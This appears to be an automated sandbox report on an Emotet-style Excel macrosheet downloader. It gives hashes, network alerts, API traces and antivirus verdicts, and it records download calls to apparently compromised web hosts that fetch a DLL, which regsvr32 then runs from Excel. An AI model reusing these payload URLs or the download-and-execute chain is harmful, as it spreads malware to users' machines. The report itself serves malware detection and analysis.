Summary | ZeroBOX

Sk7iJ9

MS_XLSX_Macrosheet
Category FILE
Machine s1_win7_x6401
Started May 23, 2022, 12:39 p.m.
Completed May 23, 2022, 12:41 p.m.
Size 46.6KB
Type Microsoft Excel 2007+
MD5 55b8a285e688901b23630d99610ecd13
SHA256 1bdada6954ab20722dfb51b2ace2e6fcdfb556210c74bb059752552f5fa8f78f
CRC32 672FD58C
ssdeep 768:QmBlntZhEI2YmxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oRM:hBlntTEvDLmXi3JvG6YzATOJnXYSXRM
Yara
  • MS_XLSX_with_Macrosheet - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
216.239.32.21 Active Moloch
34.117.168.233 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 34.117.168.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.101:49165 -> 34.117.168.233:443
Issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
Subject: CN=gonorthhalifax.ca
Fingerprint: ca:f2:8f:fe:2b:67:7e:63:08:5b:8f:bf:f9:59:06:a0:a7:8b:c9:91

request GET http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
request GET https://www.gonorthhalifax.ca/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fbe1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fbd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fb21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fae1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6faa1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa41000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa21000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\xewn.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$Sk7iJ9
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$Sk7iJ9
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: http://eles-tech.com/css/KzMysMqFMs/
stack_pivoted: 0
filepath_r: ..\xewn.dll
filepath: C:\Users\test22\xewn.dll
2148270085 0

URLDownloadToFileW

url: http://gonorthhalifax.com/wp-content/yTmYyLbTKZV2czsUO/
stack_pivoted: 0
filepath_r: ..\xewn.dll
filepath: C:\Users\test22\xewn.dll
1 0 0
parent_process excel.exe martian_process C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Lionic Trojan.MSOffice.Emotet.4!c
MicroWorld-eScan Trojan.GenericKD.48779066
FireEye Trojan.GenericKD.48779066
CAT-QuickHeal DOC.Emotet.45887
McAfee Downloader-FCHG!B1064BE65285
Sangfor Malware.Generic-XLM.Save.ma35
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
K7GW Trojan ( 0058ce181 )
K7AntiVirus Trojan ( 0058ce181 )
VirIT X97M.Emotet.DHA
Cyren XLSM/Emotet.A.gen!Camelot
Symantec Trojan.Mdropper
ESET-NOD32 multiple detections
Avast VBS:Malware-gen
Kaspersky HEUR:Trojan.MSOffice.Emotet.gen
BitDefender Trojan.GenericKD.48779066
Tencent Trojan.MsOffice.XmlMacroSheet.11019672
Ad-Aware Trojan.GenericKD.48779066
Sophos Mal/DocDl-P
DrWeb X97M.DownLoader.961
TrendMicro Trojan.XF.EMOTET.SMYXCCOA
McAfee-GW-Edition X97M/Downloader.kj
Emsisoft Trojan.GenericKD.48779066 (B)
Ikarus Trojan-Downloader.XLM.Agent
Avira W97M/Dldr.Emotet.FE
Microsoft TrojanDownloader:O97M/Emotet.PDWB!MTB
ViRobot XLS.Z.Agent.47738.BJ
GData Macro.Trojan-Downloader.Agent.BDH
Cynet Malicious (score: 99)
MAX malware (ai score=83)
Zoner Probably Heur.W97ShellN
Fortinet MSExcel/Agent.DVP!tr.dldr
AVG VBS:Malware-gen